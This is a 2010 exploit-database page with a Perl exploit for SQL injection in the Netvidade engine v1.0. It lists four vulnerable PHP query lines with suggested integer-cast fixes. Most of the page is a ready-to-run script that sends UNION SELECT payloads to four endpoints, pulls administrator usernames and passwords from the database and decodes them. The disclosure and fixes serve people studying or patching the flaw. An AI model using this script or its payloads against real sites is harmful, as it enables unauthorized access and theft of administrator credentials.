Netvidade engine v1.0 Multiple Vulnerabilities
Posted on 10 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Netvidade engine v1.0 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================== Netvidade engine v1.0 Multiple Vulnerabilities ============================================== #!/usr/bin/perl -w use strict; use LWP::UserAgent; use Getopt::Long; use MIME::Base64; # #'#/ # (-.-) # ----------------------oOO---(_)---OOo---------------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Research Division /____/ 2o1o | # ----------------------------------------------------------- # | Netvidade engine v1.0 Multiple Vulnerabilities | # ----------------------------------------------------------- # [!] Discovered by.: pwndomina # [!] Vendor........: http://www.netvidade.com # [!] Detected......: 15.04.2010 # [!] Reported......: 06.05.2010 # [!] Response......: xx.xx.2010 # # [!] Bug...........: $_GET['id'] in webtemplate-categoria.php near line 6 # # 3: if ($_GET['id']==0) # 4: $lista_webtemp=$netvidade->lista_webtemp(); # 5: else # 6: $lista_webtemp=$netvidade->lista_webtemp_categoria($_GET['id']); # # The function lista_webtemp_categoria() is in class/var/netvidade.class.php near line 212 # # 212: function lista_webtemp_categoria($id) # 213: { # 214: $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=$id"; # 215: $a=$this->CORE->db(); # 216: $res=$a->abrecursor($query); # 217: return $res; # 218: } # # [!] Bug...........: $_GET['id'] in concorrer.php near line 2 # # 2: $lista_proposta=$recrutamento->lista_proposta($_GET['id']); # # The function lista_proposta() is in class/var/recrutamento.class.php near line 42 # # 42: function lista_proposta($id) # 43: { # 44: $query="select * from recrutamento_propostas where id=$id"; # 45: $a=$this->CORE->db(); # 46: $res=$a->abrecursor($query); # 47: return $res; # 48: } # # [!] Bug...........: $_GET[id] in detalhe.php near line 6 # # 6: $noticias=$a->lista_noticia_detalhe($_GET[id]); # # The function lista_noticia_detalhe() is in class/var/noticias.class.php near line 208 # # 208: function lista_noticia_detalhe($id) # 209: { # 210: $query=" # 211: select a.*,b.id as categoria_id, b.titulo as categoria_nome, c.nome as autor_nome # 212: from noticias a, noticias_categorias b, administradores c # 213: where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1) # 214: "; # 215: # 216: $a=$this->CORE->db(); # 217: $res=$a->abrecursor($query); # 218: return $res; # 219: } # # [!] Bug...........: $_GET[id] in newsletter_preview.php near line 6 # # 6: $dados=$a->lista_newsletter($_GET[id]); # # The function lista_newsletter() is in class/var/newsletter.class.php near line 113 # # 113: function lista_newsletter($id) # 114: { # 115: $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=$id"; # 116: $a=$this->CORE->db(); # 117: $res=$a->abrecursor($query); # 118: return $res; # 119: } # # [!] Quick fix.....: in class/var/netvidade.class.php line 214 # # - replace: # $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=$id"; # # - with: # $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=".(int)$id; # # [!] Quick fix.....: in class/var/recrutamento.class.php line 44 # # - replace: # $query="select * from recrutamento_propostas where id=$id"; # # - with: # $query="select * from recrutamento_propostas where id=".(int)$id; # # [!] Quick fix.....: in class/var/noticias.class.php line 213 # # - replace: # where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1) # # - with: # where a.categoria=b.id and a.id=".(int)$id." and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1) # # [!] Quick fix.....: in class/var/newsletter.class.php line 115 # # - replace: # $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=$id"; # # - with: # $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=".(int)$id; # # [!] Greetings.....: cih.ms and phact.in # if(!$ARGV[3]) { print " \#'#/ "; print " (-.-) "; print " ---------------------oOO---(_)---OOo----------------------"; print " | Netvidade engine v1.0 Multiple Vulnerabilities Exploit |"; print " | discovered by pwndomina |"; print " | coded by DNX |"; print " ----------------------------------------------------------"; print " [!] Usage: perl netvidade.pl [Host] [Path] [Target] <Options>"; print " [!] Example: perl netvidade.pl www.host.com /path/ -t 3 -u 1"; print " [!] Targets:"; print " -t 1 webtemplate-categoria.php"; print " -t 2 concorrer.php"; print " -t 3 detalhe.php"; print " -t 4 newsletter_preview.php"; print " [!] Options:"; print " -u [no] User-Id"; print " -p [ip:port] Proxy support"; print " [!] Notes:"; print " For the targets 2, 3 & 4 you can use -u option."; print " "; exit; } my %options = (); GetOptions(\%options, "t=i", "u=i", "p=s"); my $ua = LWP::UserAgent->new(); my $host = $ARGV[0]; my $path = $ARGV[1]; my $target = "http://".$host.$path; my $userid = ""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } if($options{"u"}) { $userid = "+where+id=".$options{"u"}; } print "[!] Exploiting... "; if($options{"t"} == 1) { exploit1(); } elsif($options{"t"} == 2) { exploit2(); } elsif($options{"t"} == 3) { exploit3(); } elsif($options{"t"} == 4) { exploit4(); } print " [!] Exploit done "; sub exploit1 { my $url = "http://".$host.$path."webtemplate-categoria.php?id=-1337+union+select+1,2,concat(0x23,0x23,username,0x23,password,0x23,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+administradores"; my $res = $ua->get($url); check($res); } sub exploit2 { my $url = "http://".$host.$path."concorrer.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6,7,8,9,10+from+administradores".$userid; my $res = $ua->get($url); check($res); } sub exploit3 { my $url = "http://".$host.$path."detalhe.php?id=-1337+union+select+1,2,3,concat(0x23,0x23,username,0x23,password,0x23,0x23),5,6,7,8,9,10,11,12,13,14+from+administradores".$userid."/*"; my $res = $ua->get($url); check($res); } sub exploit4 { my $url = "http://".$host.$path."newsletter_preview.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6+from+administradores".$userid; my $res = $ua->get($url); check($res); } sub check { my $res = shift; my $content = $res->content; my @c = split(/ /, $content); foreach (@c) { if($_ =~ /##(.*?)#(.*?)##/) { print $1.":".decode_base64($2)." "; } } } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
